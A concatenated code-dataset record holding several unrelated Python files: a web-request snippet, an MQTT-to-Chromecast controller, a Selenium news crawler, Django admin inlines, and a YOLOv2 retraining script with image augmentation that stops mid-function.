H_PS_PSSID=1456_21106_18559_22157; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; BD_CK_SAM=1; PSINO=3; BD_HOME=0; H_PS_645EC=f7edPjbi2a1VIdyzehiUXlUwqqlF3aVCNaM8ezO4SHP1rMP3AiJCESfeVoE\")\n#req.add_header(\"Accept\",\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\")\n#req.add_header(\"Accept-Encoding\",\"gzip, deflate, br\")\n#req.add_header(\"Accept-Language\",\"zh-CN,zh;q=0.9\")\n#req.add_header(\"Cache-Control\",\"max-age=0\")\n#req.add_header(\"Connection\",\"keep-alive\")\n# req.data=postBody #添加请求参数\n\ntry:\n #ip(ippools)\n TestData = urllib.request.urlopen(req).read()\n # 获取数据的编码\n encodeDic = chardet.detect(TestData)\n for key, value in encodeDic.items():\n if (key == \"encoding\"):\n encoding = value\n # 获取最终数据\n sourceHtml = urllib.request.urlopen(req).read().decode(encoding, \"ignore\")\n\n if(sourceHtml!=\"\"):\n soup = BeautifulSoup(sourceHtml, \"lxml\")\n result= soup.select_one(\"#pinyin\").find_all(\"b\")\n # result=soup.title.get_text()\n print(result)\n print(len(sourceHtml))\nexcept Exception as err:\n print(\"错误信息:{0}\".format(err))\n","sub_path":"通用请求代码.py","file_name":"通用请求代码.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154186887","text":"\n# mqttcast\n# (c) Copyright Si Dunford, June 2020\n# VERSION 0.3\n\n\"\"\"\nCHANGES\n26 JUN 2020 V0.0 INITIAL VERSION\n27 JUN 2020 V0.1 Added Basic (string) and Extended (json) command support:\n V0.2 Added reboot and quit\n28 JUN 2020 V0.3 Added forward,rewind,start,end,replay,seek and skip\n Fixed several bugs\n Published to GITHUB\n\"\"\"\n\nimport configparser, json, sys, time\nimport pychromecast\nimport paho.mqtt.client as paho\nimport traceback\n\nAPPNAME = 'mqttcast'\ndevices = {}\nconfig = configparser.ConfigParser()\nmqtt=None\n\ndef on_connect( client, userdata, flags, rc ):\n print( \"- MQTT connected with result code \"+str(rc))\n print( \"- Subscribing to chromecast/+/command\" )\n client.subscribe( \"chromecast/+/command\" )\n \ndef on_message( client, userdata, msg ):\n try: \n #topic = msg.topic\n name = msg.topic.split(\"/\")[1]\n device_name = get_name( name )\n if device_name in devices:\n device = devices[ device_name ]\n payload = msg.payload.decode()\n try:\n action = json.loads(payload)\n except ValueError:\n action = { \"action\":payload }\n print( \"MSG: \"+name+\" // \" + str(action) ) \n device.command( action )\n \n except Exception as e:\n #exception_type, exception_object, exception_traceback = sys.exc_info()\n print( \"ON_MESSAGE EXCEPTION\" )\n #print( str(e)+\" at line \"+str(exception_traceback.tb_lineno) )\n traceback.print_exc()\n\nsupported_actions = { 'continue', 'end', 'forward', 'mute', 'pause', 'play', 'quit', 'reboot', 'replay', 'rewind', 'seek', 'skip', 'start', 'stop', 'unmute', 'volume', 'voldown', 'volup' }\nclass Chromecast:\n \n def __init__( self, name, device ):\n self.name = name\n self.device = device\n device.wait()\n #self.sendDeviceStatus()\n self.device.register_status_listener(self)\n self.device.media_controller.register_status_listener(self)\n \n def close( self ):\n pass\n \n def new_media_status( self, status ):\n print( \"MEDIA STATUS:\"+str(status) )\n retval = mqtt.publish( \"chromecast/{}/media-status\".format(self.device.name), str(status) )\n \n def new_cast_status( self, status ):\n print( \"CAST STATUS:\"+str(status) )\n retval = mqtt.publish( \"chromecast/{}/cast-status\".format(self.device.name), str(status) )\n \n def command( self, action ):\n # Dispatch method:\n cmd = action.get( 'action','' ).lower()\n data = action.get( 'data','' )\n meta = action.get( 'meta','' )\n # Prevent command injection\n if cmd in supported_actions:\n # Get the method from 'self'. Default to a lambda.\n method = getattr( self, \"action_\"+cmd, lambda: \"action_invalid\" )\n # Call the method as we return it\n return method( data, meta )\n\n def action_invalid( self, data, meta ):\n print( \"INVALID COMMAND\")\n\n def action_continue( self, data, meta ):\n self.device.media_controller.play()\n\n def action_end( self, data, meta ):\n # Seek to end of the current media\n duration = self.device.media_controller.status.duration\n self.device.media_controller.seek( duration )\n \n def action_forward( self, data, meta ):\n try:\n skip = int( data )\n except ValueError:\n skip = 30\n if skip==0: skip = 30\n duration = self.device.media_controller.status.duration\n time = self.device.media_controller.status.current_time\n seek = min(time + skip, duration )\n self.device.media_controller.seek( seek )\n \n def action_mute( self, data, meta ):\n self.device.set_volume_muted(True)\n \n def action_pause( self, data, meta ):\n self.device.media_controller.pause()\n \n def action_play( self, url, meta ):\n if url=='':\n self.device.media_controller.play()\n else:\n self.device.media_controller.play_media( url, meta )\n\n def action_quit( self, data, meta ):\n self.device.quit_app()\n\n def action_reboot( self, data, meta ):\n self.device.reboot()\n \n def action_replay( self, data, meta ):\n # Seek to start of the current media\n self.device.media_controller.seek( 0 )\n\n def action_rewind( self, data, meta ):\n try:\n skip = int( data )\n except ValueError:\n skip = 30\n if skip==0: skip = 30\n time = self.device.media_controller.status.current_time\n seek = max(time - skip, 0 )\n self.device.media_controller.seek( seek )\n\n def action_seek( self, data, meta ):\n seek = float( data )\n self.device.media_controller.seek( seek )\n \n def action_skip( self, data, meta ):\n # Seek to end of the current media\n duration = self.device.media_controller.status.duration\n self.device.media_controller.seek( duration )\n \n def action_start( self, data, meta ):\n # Seek to start of the current media\n self.device.media_controller.seek( 0 )\n \n def action_stop( self, data, meta ):\n self.device.media_controller.stop()\n\n def action_unmute( self, data, meta ):\n self.device.set_volume_muted(False)\n \n def action_volume( self, level, meta ):\n # level must be between 0 and 1\n level = min(float( level ) / 10,1)\n self.device.set_volume(level)\n \n def action_voldown( self, data, meta ):\n self.device.volume_down()\n \n def action_volup( self, data, meta ):\n self.device.volume_up()\n \n#cast.media_controller.play_media(args.url, \"audio/mp3\")\n\n \n#def list_devices():\n# print(\"Currently known cast devices:\")\n# for name, service in listener.services.items():\n# print(\"-> \"+str(name)+\"\\n \"+str(service))\n\n# Look up friendly name and return device name\ndef get_name( friendly ):\n for device in devices:\n if devices[device].device.name==friendly:\n return device\n return None\n\ndef publish_status( status, device ):\n topic = \"chromecast/{}/device-status\".format(device.name)\n message = {\n 'status':status,\n 'name':device.name,\n 'type':device.cast_type,\n 'model':device.model_name,\n 'host':device.host\n }\n retval = mqtt.publish( topic, json.dumps( message ) )\n \ndef add_callback(name):\n #https://www.reddit.com/r/homeautomation/comments/4fc01z/quick_question_for_openhab_users/d28vnc4/\n #https://www.domoticz.com/forum/viewtopic.php?t=7022&start=20\n #https://community.openhab.org/t/google-cast-audio-chromecast-control/9991\n \n #name is the dictionary key to find\n #the chromecast metadata in listener.services.\n \n if name not in devices and name in listener.services:\n device = pychromecast.get_chromecast_from_host(listener.services[name])\n print( \"ADDING NEW DEVICE: \"+device.name )\n #print( listener.services[name] )\n print( str(device) )\n #print( device.name, device.cast_type )\n devices[name] = Chromecast( name, device )\n publish_status( \"online\", device )\n #retval = mqtt.publish( \"chromecast/{}/device\".format(device.name), \"ONLINE\" ) \n\ndef remove_callback(name, service):\n #print(\"Lost cast device {} {}\".format(name, service))\n if name in devices:\n publish_status( \"offline\", devices[name].device )\n print( str(devices[name].device) )\n #retval = mqtt.publish( \"chromecast/{}/device\".format(devices[name].name), \"OFFLINE\" )\n devices[name].close()\n del devices[name]\n #list_devices()\n\ndef update_callback(name):\n #print(\"Update cast device {}\".format(name))\n if name in devices:\n print( str(devices[name].device) )\n publish_status( \"update\", devices[name].device )\n #retval = mqtt.publish( \"chromecast/{}/device\".format(devices[name].name), \"UPDATE\" )\n\n\"\"\"\nclass StatusListener:\n def __init__(self, name, cast):\n self.name = name\n self.cast = cast\n\n def new_cast_status(self, status):\n print(\"[\", time.ctime(), \" - \", self.name, \"] status chromecast change:\")\n print(status)\n\n\nclass StatusMediaListener:\n def __init__(self, name, cast):\n self.name = name\n self.cast = cast\n\n def new_media_status(self, status):\n print(\"[\", time.ctime(), \" - \", self.name, \"] status media change:\")\n print(status)\n\"\"\"\n\ndef Main():\n global mqtt\n config.read('config.ini')\n \n # Default MQTT section\n if not 'mqtt' in config:\n config['mqtt']={}\n host = config['mqtt']\n \n # MQTT\n mqtt = paho.Client( APPNAME, clean_session=False )\n hostname = host.get('host','127.0.0.1')\n hostport = host.getint('port',1883)\n if 'username' in host:\n username = host.get('username','user')\n password = host.get('password','password')\n print( \"- MQTT: \"+username+\"@\"+hostname+\":\"+str(hostport) ) \n mqtt.username_pw_set( username, password )\n else:\n print( \"- MQTT: \"+hostname+\":\"+str(hostport) ) \n \n try:\n\n mqtt.connect( hostname, hostport , 60 )\n except Exception as e:\n #logging.critical( str(e) )\n print( e )\n sys.exit()\n \n mqtt.on_connect = on_connect\n mqtt.on_message = on_message\n mqtt.loop_forever()\n mqtt.disconnect()\n \n #while True:\n # time.sleep(1)\n\nif __name__==\"__main__\":\n\n # Start Chromecast discovery\n listener = pychromecast.CastListener(add_callback, remove_callback, update_callback)\n browser = pychromecast.discovery.start_discovery(listener)\n\n try:\n Main()\n except KeyboardInterrupt:\n pass\n\n pychromecast.stop_discovery(browser)\n","sub_path":"mqttcast.py","file_name":"mqttcast.py","file_ext":"py","file_size_in_byte":9842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585288611","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 8 19:58:46 2017\n\n@author: Khepri\n\"\"\"\nimport numpy as np\n\ndef import_pfile(filename):\n global parameters\n parameters = np.genfromtxt(filename, dtype=str, delimiter=',')\n \ndef set_variables(param):\n global a\n global b\n global c\n global d\n global e\n global f\n\n \n a = float(param[0][2])\n b = float(param[1][2])\n c = float(param[2][2])\n d = float(param[3][2])\n e = float(param[4][2])\n f = float(param[5][2])\n return(a,b,c,d,e,f)\n \ndef function():\n answer= a*b+c/d-e*f\n return(answer)\n\n","sub_path":"TesterFunction.py","file_name":"TesterFunction.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"53586518","text":"from typing import Union\n\n\ndef sun_angle(time: str) -> Union[int, str]:\n hour = int(time[:2])\n if 6 <= hour <= 18: # Hour is between dawn and dusk\n minutes = ((hour - 6) * 60) + int(time[3:])\n\n if minutes > 720:\n return \"I don't see the sun!\"\n angle = round((0.25 * minutes), 2)\n return angle\n else:\n return \"I don't see the sun!\"\n\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(sun_angle(\"07:00\"))\n\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert sun_angle(\"07:00\") == 15\n assert sun_angle(\"01:23\") == \"I don't see the sun!\"\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","sub_path":"Sun Angle/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637996864","text":"# -*- coding: utf-8 -*-\n\nimport time, datetime, re, hashlib, os, sys\nfrom time import sleep\nfrom selenium.common.exceptions import NoSuchElementException, NoSuchAttributeException, TimeoutException\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n#import crawlerfun\n\nclass Realli:\n def __init__(self, d):\n timeStamp = time.time()\n timeArray = time.localtime(timeStamp)\n self.date = time.strftime('%Y-%m-%d %H:%M:%S', timeArray)\n self.d = d\n self.dir = self._dir = self.source = ''\n # self.ipnum = crawlerfun.ip2num('61.130.181.229')\n self.debug = True\n\n\n def crawl(self):\n print('\\n', '-' * 10, 'https://realli.org/#/', '-' * 10, '\\n')\n self.i = 0\n self.browser = webdriver.Firefox()\n self.browser.set_window_position(x = 680, y = 0)\n n = 0\n\n keywords = ['', 'report']\n\n for keyword in keywords:\n self.keyword = keyword\n try:\n url = 'https://realli.org/#/' + keyword\n self.browser.get(url)\n except TimeoutException:\n n = -1\n break\n\n for i in range(5):\n if keyword == '':\n newsList = self.browser.find_elements_by_css_selector('div.posts > div.post.multi')\n length = len(newsList)\n\n for i in range(length):\n item = self.browser.find_elements_by_css_selector('div.posts > div.post.multi')[i]\n dateTime = item.find_element_by_css_selector('div.post__oper > span:nth-child(3)').text\n if '前' in dateTime:\n self.extract(item)\n else:\n break\n elif keyword == 'report':\n newsList = self.browser.find_elements_by_css_selector('ul.list > li')\n length = len(newsList)\n\n for i in range(length):\n item = self.browser.find_elements_by_css_selector('ul.list > li')[i]\n pubTime = item.find_element_by_css_selector('div.info > div.oper > span:nth-child(4)').text\n dateTime = pubTime.replace('发布', '')\n if dateTime in self.date:\n self.extract(item)\n else:\n break\n\n\n # if self.i < length:\n # break\n # else:\n # try:\n # self.browser.find_element_by_css_selector('div.more_con > a').click()\n # except NoSuchElementException:\n # break\n\n\n print('quantity:', self.i)\n if n == 0:\n if self.i > 0:\n # self.rename()\n # self.expire()\n # self.deleteFiles()\n\n return 'complete', self.source, 'ok'\n else:\n return 'complete', 'none', 'ok'\n else:\n return 'interrupt', 'none', 'error'\n\n\n # 提取信息,一条的\n def extract(self, item):\n titleInfo = item.find_element_by_css_selector('div.post__title')\n title = titleInfo.text\n try:\n md5 = self.makeMD5(title)\n\n # dict filter\n if md5 in self.d:\n return\n else:\n self.d[md5] = self.date.split(' ')[0] # 往dict里插入记录\n self.i += 1\n\n\n titleInfo.click()\n self.source, href = self.getPageText()\n\n # self.write_new_file(href, title, self.source, self.i, self.date, 1161565)\n self.browser.back()\n sleep(2)\n except Exception:\n self.i -= 1\n return\n\n\n def getPageText(self): # 获取网页正文\n try:\n pageHTML = self.browser.find_element_by_css_selector('div.detail').get_attribute('innerHTML')\n except NoSuchElementException:\n pageHTML = self.browser.page_source\n\n link = self.browser.current_url\n\n return pageHTML, link\n\n\n # 生成md5信息\n def makeMD5(self, link):\n m = hashlib.md5()\n b = link.encode(encoding = 'utf-8')\n m.update(b)\n enc = m.hexdigest()\n\n return enc\n\n\n # 删除过期的记录\n def expire(self):\n # 检查过期数据\n li = []\n current = self.date.split(' ')[0]\n for k, v in self.d.items():\n if current != v:\n li.append(k)\n\n # 删除字典里过期的数据\n for i in li:\n self.d.pop(i)\n\n # 更新txt文件\n try:\n fileName = '/home/zran/src/crawler/33/manzhua/crawlpy3/record/cnstock_md5.txt'\n os.remove(fileName)\n with open(fileName, 'a+') as f:\n f.write(str(self.d))\n except Exception as e:\n print(e)\n\n\n # 重新修改文件夹名称\n def rename(self):\n try:\n root = '/estar/newhuike2/1/'\n lst = os.listdir(root)\n for l in lst:\n if '_' in l:\n os.rename(root + l, root + l.strip('_'))\n except:\n pass\n\n def deleteFiles(self):\n filePath = '/root/estar_save/cnstock/'\n timeStamp = time.time()\n timeArray = time.localtime(timeStamp)\n current = time.strftime(\"%Y-%m-%d\", timeArray)\n name = os.listdir(filePath)\n\n for i in name:\n try:\n fileName = filePath + i\n fileInfo = os.stat(fileName)\n except FileNotFoundError:\n continue\n ts = fileInfo.st_mtime\n timeArr = time.localtime(ts)\n date = time.strftime(\"%Y-%m-%d\", timeArr)\n if current != date:\n os.remove(fileName)\n\n\nif __name__ == '__main__':\n r = Realli({})\n r.crawl()","sub_path":"crawl/hangye_web/realli/realli.py","file_name":"realli.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423219617","text":"from django.contrib import admin\nfrom django.shortcuts import reverse\nfrom django.utils.safestring import mark_safe\nfrom django.template.defaultfilters import escape\nfrom django.db import models as django_models\nfrom django import forms\n\nfrom . import models\n\n\nclass MailSentInline(admin.TabularInline):\n model = models.MailSent\n fields = ('recipient_link', 'datestamp', 'last_opened')\n readonly_fields = ('recipient_link', 'datestamp', 'last_opened')\n empty_value_display = '(Not yet)'\n extra = 0\n max_num = 0\n can_delete = False\n\n def recipient_link(self, obj):\n return mark_safe(\n '{display_name}'.format(\n url=reverse(\"admin:wedding_person_change\",\n args=(obj.recipient.pk,)),\n display_name=escape(obj.recipient.name)))\n recipient_link.short_description = \"Who\"\n\n\nclass NeedToSendInline(admin.TabularInline):\n model = models.NeedToSend\n extra = 0\n show_change_link = True\n formfield_overrides = {\n django_models.TextField: {'widget': forms.TextInput},\n }\n\n\nclass NoteInline(admin.TabularInline):\n model = models.Note\n extra = 0\n fields = ('content', 'created')\n readonly_fields = ('created',)\n formfield_overrides = {\n django_models.TextField: {'widget': forms.Textarea(attrs={'rows': 2, 'cols': 80})},\n }\n\n\nclass MailoutImageInline(admin.TabularInline):\n model = models.MailoutImage\n extra = 1\n\n\nclass PersonInline(admin.TabularInline):\n model = models.Person\n extra = 0\n show_change_link = True\n\n formfield_overrides = {\n django_models.TextField: {'widget': forms.TextInput},\n }\n\n\nclass GroupInlineForEvents(admin.TabularInline):\n model = models.Event.groups.through\n fields = ('group_link', )\n readonly_fields = ('group_link',)\n extra = 0\n max_num = 0\n verbose_name = 'invited group'\n\n def group_link(self, obj):\n return mark_safe(\n '{display_name}'.format(\n url=reverse(\"admin:wedding_group_change\",\n args=(obj.group.pk,)),\n display_name=escape(obj.group.display_name)))\n group_link.short_description = \"Group\"\n\n\nclass GroupInlineForDetailsSections(admin.TabularInline):\n model = models.DetailsSection.groups.through\n fields = ('group_link', )\n readonly_fields = ('group_link',)\n extra = 0\n max_num = 0\n verbose_name = 'invited group'\n\n def group_link(self, obj):\n return mark_safe(\n '{display_name}'.format(\n url=reverse(\"admin:wedding_group_change\",\n args=(obj.group.pk,)),\n display_name=escape(obj.group.display_name)))\n group_link.short_description = \"Group\"\n","sub_path":"animportantdate/wedding/admin_inlines.py","file_name":"admin_inlines.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"652083958","text":"\"\"\"\nThis is a script that can be used to retrain the YOLOv2 model for your own dataset.\n\"\"\"\nimport argparse\n\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom PIL import Image\nimport cv2\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.layers import Input, Lambda, Conv2D\nfrom keras.models import load_model, Model\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping\nfrom keras.preprocessing.image import Iterator\n\nfrom yad2k.models.keras_yolo import (preprocess_true_boxes, yolo_body,\n yolo_eval, yolo_head, yolo_loss)\nfrom yad2k.utils.draw_boxes import draw_boxes\n\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nfrom tqdm import tqdm\n\nimport glob\nimport random\nimport os\n\n\ntarget_width = 416*2\ntarget_height = 416*2\n\nclass ImageDataGenerator(Iterator):\n\n def __init__(self, data_path, batch_size,anchors, shuffle=True, seed=None):\n\n with open(data_path, mode='rb') as f:\n data = pickle.load(f)\n\n\n self.image_paths = data['images']\n self.boxes = data['boxes']\n self.anchors = anchors\n\n\n return super().__init__(len(self.image_paths), batch_size, shuffle, seed)\n\n def next(self):\n\n with self.lock:\n index_array, current_index, current_batch_size = next(self.index_generator)\n\n batch_image_paths = np.array(self.image_paths)[index_array]\n batch_boxes = np.array(self.boxes)[index_array]\n\n image_data, boxes = process_data(batch_image_paths, batch_boxes)\n\n detectors_mask, matching_true_boxes = get_detector_mask(boxes, self.anchors)\n\n return [image_data, boxes, detectors_mask, matching_true_boxes], np.zeros(len(image_data))\n\n\nclass ImageDataGeneratorXML_RegionCNN(Iterator):\n \"\"\"description of class\"\"\"\n\n def __init__(self, xml_paths, batch_size,anchors, operations_dict = None, shuffle=True, seed=None):\n\n self.anchors = anchors\n\n self.image_paths = []\n self.boxes = []\n for xml_path in tqdm(xml_paths):\n image_path, image_boxes = self._convert_xml(xml_path)\n\n self.image_paths.append(image_path)\n self.boxes.append(image_boxes)\n\n self.image_paths = np.array(self.image_paths)\n self.boxes = np.array(self.boxes)\n\n self.operations_dict = operations_dict\n if self.operations_dict is None:\n self.operations_dict = {}\n\n return super().__init__(len(self.image_paths), batch_size, shuffle, seed)\n \n def next(self):\n\n with self.lock:\n index_array, current_index, current_batch_size = next(self.index_generator)\n\n batch_image_paths = self.image_paths[index_array]\n batch_boxes = self.boxes[index_array]\n\n result_images = []\n result_boxes = []\n \n for image_path, image_boxes in zip(batch_image_paths,batch_boxes):\n image_boxes = image_boxes.copy()\n\n\n basic_path = \"C:/Users/Bronzi/Downloads/Train/\"\n image_path = os.path.join(basic_path,image_path.split(\"\\\\\")[-1])\n image = cv2.imread(image_path) # replace with defalut image loader\n\n for operation_key, operation_value in self.operations_dict.items():\n\n # check if the selected operation should be performed \n if np.random.choice([1,0],1)[0] == 1:\n continue\n\n if operation_key.lower() == \"flip\".lower():\n image, image_boxes = flip_image(image,image_boxes,np.random.choice(operation_value,1)[0])\n continue\n\n if operation_key.lower() == \"random_shift\".lower() and np.random.choice([1,0],1)[0] == 1:\n image, image_boxes = random_shift(image,operation_value[\"max_x_shift\"],operation_value[\"max_y_shift\"],image_boxes)\n continue\n\n if operation_key.lower() == \"intensity_shift\".lower():\n for channel, value in operation_value:\n image = image_intensity_shift(image,value,channel)\n continue\n\n if operation_key.lower() == \"new_background\".lower():\n image = new_background_image(image,operation_value[\"alpha\"],np.random.choice(operation_value[\"paths\"],1)[0]) \n continue\n\n if operation_key.lower() == \"new_background_mask\".lower():\n image = new_background_image_mask(image,image_boxes.copy(),operation_value[\"alpha\"],np.random.choice(operation_value[\"paths\"],1)[0]) \n continue\n\n image_data, boxes = process_data_new(image,image_boxes)\n \n result_images.append(image_data)\n result_boxes.append(boxes)\n\n\n # find the max number of boxes\n max_boxes = 0\n for boxz in result_boxes:\n if len(boxz) > max_boxes:\n max_boxes = len(boxz)\n\n # add zero pad for training\n for i, boxz in enumerate(result_boxes):\n if len(boxz) < max_boxes:\n zero_padding = np.zeros( (max_boxes-len(boxz), 5), dtype=np.float32)\n result_boxes[i] = np.vstack((boxz, zero_padding))\n\n\n\n result_images = np.array(result_images)\n result_boxes = np.array(result_boxes)\n\n detectors_mask, matching_true_boxes = get_detector_mask(result_boxes, self.anchors)\n\n return [result_images, result_boxes, detectors_mask, matching_true_boxes], np.zeros(len(index_array))\n \n def _convert_xml(self, xml_path):\n DOMTree = xml.dom.minidom.parse(xml_path)\n collection = DOMTree.documentElement\n\n image_path = collection.getElementsByTagName(\"Datei\")[0].getAttribute(\"Name\")\n \n sub_image_rechts = []\n for marker in collection.getElementsByTagName(\"Marker\"):\n if marker.getAttribute(\"Type\") == \"S_ROI\":\n \n pattern_id = 1\n for label in marker.getElementsByTagName(\"Label\"):\n # check json for correct name to label conversion. \n if label.getAttribute(\"value\") == \"pos\":\n pattern_id = 1\n\n for rect in marker.getElementsByTagName(\"Rect\"):\n x_min = max(0, int(rect.getAttribute(\"x\")))\n y_min = max(0, int(rect.getAttribute(\"y\")))\n\n x_max = x_min + int(rect.getAttribute(\"width\")) \n y_max = y_min + int(rect.getAttribute(\"height\"))\n \n ## class, x_min, y_min, x_max, y_max\n sub_image_rechts.append(np.array([pattern_id,x_min,y_min,x_max,y_max]))\n\n return image_path, np.array(sub_image_rechts)\n\n\n\n#http://docs.opencv.org/3.1.0/da/d6e/tutorial_py_geometric_transformations.html\ndef apply_transform(img,\n transform_matrix):\n\n \"\"\"Apply the image transformation specified by a matrix.\n # Arguments\n x: 2D numpy array, single image.\n transform_matrix: Numpy array specifying the geometric transformation.\n # Returns\n The transformed version of the input.\n \"\"\"\n rows,cols = img.shape[:2]\n dst = cv2.warpAffine(img,transform_matrix,(cols,rows))\n\n\n return dst\n\ndef random_shift(img, wrg, hrg, rects, row_axis=0, col_axis=1, channel_axis=2,\n fill_mode='nearest', cval=0.):\n \"\"\"Performs a random spatial shift of a Numpy image tensor.\n # Arguments\n x: Input tensor. Must be 3D.\n wrg: Width shift range, as a float fraction of the width.\n hrg: Height shift range, as a float fraction of the height.\n row_axis: Index of axis for rows in the input tensor.\n col_axis: Index of axis for columns in the input tensor.\n channel_axis: Index of axis for channels in the input tensor.\n fill_mode: Points outside the boundaries of the input\n are filled according to the given mode\n (one of `{'constant', 'nearest', 'reflect', 'wrap'}`).\n cval: Value used for points outside the boundaries\n of the input if `mode='constant'`.\n # Returns\n Shifted Numpy image tensor.\n \"\"\"\n h, w = img.shape[row_axis], img.shape[col_axis]\n tx = np.random.uniform(-hrg, hrg) * h\n ty = np.random.uniform(-wrg, wrg) * w\n\n min_x = min(rects[:,1])\n max_x = max(rects[:,3])\n min_y = min(rects[:,2])\n max_y = max(rects[:,4])\n\n if tx + min_x < 0:\n tx = -min_x\n if tx + max_x > w:\n tx = w-max_x\n if ty + min_y < 0:\n ty = -min_y\n if ty + max_x > h:\n ty = h - max_y\n\n translation_matrix = np.float32([[1,0,tx],[0,1,ty]])\n\n transform_matrix = translation_matrix # no need to do offset\n img = apply_transform(img, transform_matrix)\n\n rects[:,1] = rects[:,1] + tx\n rects[:,3] = rects[:,3] + tx\n\n rects[:,2] = rects[:,2] + ty\n rects[:,4] = rects[:,4] + ty\n\n return img, rects\n\ndef flip_image(image, rects, axis = 1):\n \"\"\"\n axis equals zero = vertical flip \n axis equals one = horizontal flip \n axis equals minus one = flip both axis\n axis somethink else no flip\n \"\"\"\n\n if axis not in [-1,0,1]:\n return image, rects\n\n height = image.shape[0]\n widht = image.shape[1]\n \n image = cv2.flip(image,axis)\n\n if axis == 1:\n rects[:,1] = widht - rects[:,1]\n rects[:,3] = widht - rects[:,3]\n rects[:,3], rects[:,1] = rects[:,1].copy(),rects[:,3].copy()\n elif axis == 0:\n rects[:,2] = height - rects[:,2]\n rects[:,4] = height - rects[:,4]\n rects[:,4], rects[:,2] = rects[:,2].copy(),rects[:,4].copy()\n elif axis == -1:\n rects[:,1] = widht - rects[:,1]\n rects[:,3] = widht - rects[:,3]\n rects[:,3], rects[:,1] = rects[:,1].copy(),rects[:,3].copy()\n rects[:,2] = height - rects[:,2]\n rects[:,4] = height - rects[:,4]\n rects[:,4], rects[:,2] = rects[:,2].copy(),rects[:,4].copy()\n\n return image, rects\n\ndef image_intensity_shift(image, intensity, channel = 1, min_intensity = 0, max_intensity = 255):\n\n non_zero_pixel = np.where(image[:,:,channel] > 0)\n min = np.min(image[:,:,channel][non_zero_pixel])\n max = np.max(image[:,:,channel])\n\n new_intensity_center = int(np.random.uniform(-intensity, intensity))\n\n if new_intensity_center + min < 0:\n new_intensity_center = -min\n if new_intensity_center + max > 255:\n new_intensity_center = 255 - max\n \n image[:,:,channel][non_zero_pixel] = image[:,:,channel][non_zero_pixel] + new_intensity_center\n\n return image\n\ndef new_background_image_mask(image,rects,alpha_value = 0.7, background_image_path = \"images/giraffe.jpg\"):\n\n foreground = image.copy().astype(float)\n background = cv2.imread(background_image_path).astype(float)\n background = cv2.resize(background,(foreground.shape[1],foreground.shape[0]))\n\n alpha = np.zeros_like(foreground).astype(float) \n \n for rect in rects:\n xmin = rect[1]\n ymin = rect[2]\n\n width = rect[3] - xmin\n hight = rect[4] - ymin\n cv2.rectangle(alpha,(xmin,ymin),(xmin+width,ymin+hight),(alpha_value,alpha_value,alpha_value),-1)\n\n foreground = cv2.multiply(alpha, foreground)\n\n background = cv2.multiply(1 - alpha, background)\n\n outImage = cv2.add(foreground, background)\n\n return outImage.astype(int)\n\ndef new_background_image(image,alpha_value = 0.7,background_image_path = \"images/giraffe.jpg\"):\n\n background = cv2.imread(background_image_path)\n background = cv2.resize(background,(image.shape[1],image.shape[0]))\n\n result = cv2.addWeighted(image,alpha_value,background,1-alpha_value,0)\n\n return result\n\n\n\n# Args\nargparser = argparse.ArgumentParser(\n description=\"Retrain or 'fine-tune' a pretrained YOLOv2 model for your own data.\")\n\nargparser.add_argument(\n '-d',\n '--data_path',\n help=\"path to the training data\",\n default=os.path.join('model_data', 'Hep', 'train_images_yolo.p'))\n\nargparser.add_argument(\n '-v',\n '--validation_data_path',\n help=\"path to the validation data\",\n default=os.path.join('model_data', 'Hep', 'validation_images_yolo.p'))\n\nargparser.add_argument(\n '-a',\n '--anchors_path',\n help='path to anchors file, defaults to yolo_anchors.txt',\n default=os.path.join('model_data',\"Hep\", 'yolo_anchors.txt'))\n\nargparser.add_argument(\n '-c',\n '--classes_path',\n help='path to classes file, defaults to pascal_classes.txt',\n default=os.path.join('model_data', 'Hep', 'hep_classes.txt'))\n\n# Default anchor boxes\nYOLO_ANCHORS = np.array(\n ((0.57273, 0.677385), (1.87446, 2.06253), (3.33843, 5.47434),\n (7.88282, 3.52778), (9.77052, 9.16828)))\n\n\ndef _main(args):\n data_path = os.path.expanduser(args.data_path)\n validation_data_path = os.path.expanduser(args.validation_data_path)\n classes_path = os.path.expanduser(args.classes_path)\n anchors_path = os.path.expanduser(args.anchors_path)\n\n class_names = get_classes(classes_path)\n anchors = get_anchors(anchors_path)\n\n xml_paths = glob.glob('C:/Users/Bronzi/Downloads/Train/*.xml', recursive=True)\n\n random.shuffle(xml_paths)\n \n imageDataGenerator_training = ImageDataGenerator(args.data_path,2,anchors)\n \n #for stuff in imageDataGenerator_training:\n # break;\n # print (\"\")\n \n #imageDataGenerator_validation = ImageDataGenerator(args.data_path,2,anchors)\n\n operations = {\n \"flip\":[1,0,-1,4],\n \"random_shift\":\n {\n \"max_x_shift\":0.5,\n \"max_y_shift\":0.5\n },\n \"intensity_shift\": [(1,50),(2,50)],\n }\n\n imageDataGenerator_training = ImageDataGeneratorXML_RegionCNN(xml_paths[:30],2,anchors,operations)\n imageDataGenerator_validation = ImageDataGeneratorXML_RegionCNN(xml_paths[30:] ,2,anchors)\n\n anchors = YOLO_ANCHORS\n 